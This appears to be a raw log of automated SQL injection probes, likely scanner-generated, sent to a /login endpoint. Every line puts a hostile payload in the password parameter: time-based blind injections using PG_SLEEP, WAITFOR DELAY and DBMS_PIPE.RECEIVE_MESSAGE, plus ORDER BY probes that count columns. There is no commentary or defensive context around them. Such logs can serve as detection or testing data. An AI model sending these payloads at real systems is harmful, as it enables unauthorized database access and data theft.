GET /login?username=abc&password=123 AND 1515=(SELECT 1515 FROM PG_SLEEP(5))-- PgeE HTTP/1.1 
GET /login?username=abc&password=123') AND 1515=(SELECT 1515 FROM PG_SLEEP(5)) AND ('OoDW'='OoDW HTTP/1.1 
GET /login?username=abc&password=123' AND 1515=(SELECT 1515 FROM PG_SLEEP(5)) AND 'Zqlk'='Zqlk HTTP/1.1 
GET /login?username=abc&password=123) WAITFOR DELAY '0:0:5' AND (6147=6147 HTTP/1.1 
GET /login?username=abc&password=123 WAITFOR DELAY '0:0:5' HTTP/1.1 
GET /login?username=abc&password=123 WAITFOR DELAY '0:0:5'-- hVmx HTTP/1.1 
GET /login?username=abc&password=123') WAITFOR DELAY '0:0:5' AND ('oDNw'='oDNw HTTP/1.1 
GET /login?username=abc&password=123' WAITFOR DELAY '0:0:5' AND 'tWTl'='tWTl HTTP/1.1 
GET /login?username=abc&password=123) AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5) AND (5787=5787 HTTP/1.1 
GET /login?username=abc&password=123 AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5) HTTP/1.1 
GET /login?username=abc&password=123 AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5)-- Djiq HTTP/1.1 
GET /login?username=abc&password=123') AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5) AND ('Lyac'='Lyac HTTP/1.1 
GET /login?username=abc&password=123' AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5) AND 'APIe'='APIe HTTP/1.1 
GET /login?username=abc&password=123) ORDER BY 1-- TMmJ HTTP/1.1 
GET /login?username=abc&password=123) ORDER BY 9030-- RTTw HTTP/1.1 
GET /login?username=abc&password=123 ORDER BY 1-- mDvA HTTP/1.1 
GET /login?username=abc&password=123 ORDER BY 1200-- eNbW HTTP/1.1 
GET /login?username=abc&password=123 ORDER BY 1-- sYTq HTTP/1.1 
GET /login?username=abc&password=123 ORDER BY 8916-- lILp HTTP/1.1 
GET /login?username=abc&password=123') ORDER BY 1-- AOfY HTTP/1.1 
GET /login?username=abc&password=123') ORDER BY 6451-- Hzva HTTP/1.1 
GET /login?username=abc&password=123' ORDER BY 1-- Pauy HTTP/1.1 
GET /login?username=abc&password=123' ORDER BY 9918-- mEOJ HTTP/1.1